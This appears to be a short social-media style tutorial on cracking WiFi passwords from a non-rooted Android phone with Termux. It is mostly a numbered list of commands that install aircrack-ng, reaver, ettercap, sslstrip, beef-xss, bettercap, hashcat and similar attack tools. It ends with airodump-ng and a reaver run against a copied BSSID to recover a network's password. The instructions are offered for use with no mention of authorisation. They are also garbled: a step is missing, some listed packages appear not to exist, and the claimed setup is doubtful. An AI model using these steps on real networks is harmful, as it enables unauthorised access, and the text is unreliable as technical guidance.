For Non-Rooted Device-
✅First install termux
and open it.
now type command-
1. pkg install git && pkg install curl && pkg install python && pkg install python2
now you have to install ubuntu in your termux app.
UBUNTU is a type of linux.
because it is linux based OPERATING SYSTEM.
type commands-
0. termux-setup-storage
1. clear
3. ./start.sh
4. clear
5. apt-get install git
6. apt-get install net-tools
7. apt-get install termux-setup-storage-tools
8. apt-get install wireless_tools
9. apt-get install aircrack-ng
10. apt-get install xterm
11. apt-get install isc-dhcp-server
12. apt-get install dhcp-server
13. apt-get install dhcp
14. apt-get install reaver
15. apt-get install ettercap
16. apt-get install ettercap-text-only
17. apt-get install ettercap-graphical
18. apt-get install dsniff
19. apt-get install hostapd
20. apt-get install iptables
21. apt-get install bully
22. apt-get install sslstrip
23. apt-get install beef-xss
24. apt-get install beef-project
25. apt-get install expect
26. apt-get install expect-dev
27. apt-get install lighttpd
28. apt-get install crunch
29. apt-get install hashcat
30. apt-get install mdk3
31. apt-get install bettercap
32. apt-get install pixiewps
33. apt-get install curl
34. apt-get install pip
35. apt-get install airmon-ng
36. airmon-ng stop wlan0
37. airmon-ng start wlan0
38. airodump-ng wlan0
39. reaver -i
now scroll up in your termux and copy your BSSID first
now type cmd-
40. reaver -i wlan0 -b [paste your BSSID] -vv
now you will be switching on channel 1 in wlan0
now you have to wait to get wifi password.
reaver is best but it takes too much time according to your password whether it is hard or weak password it will crack
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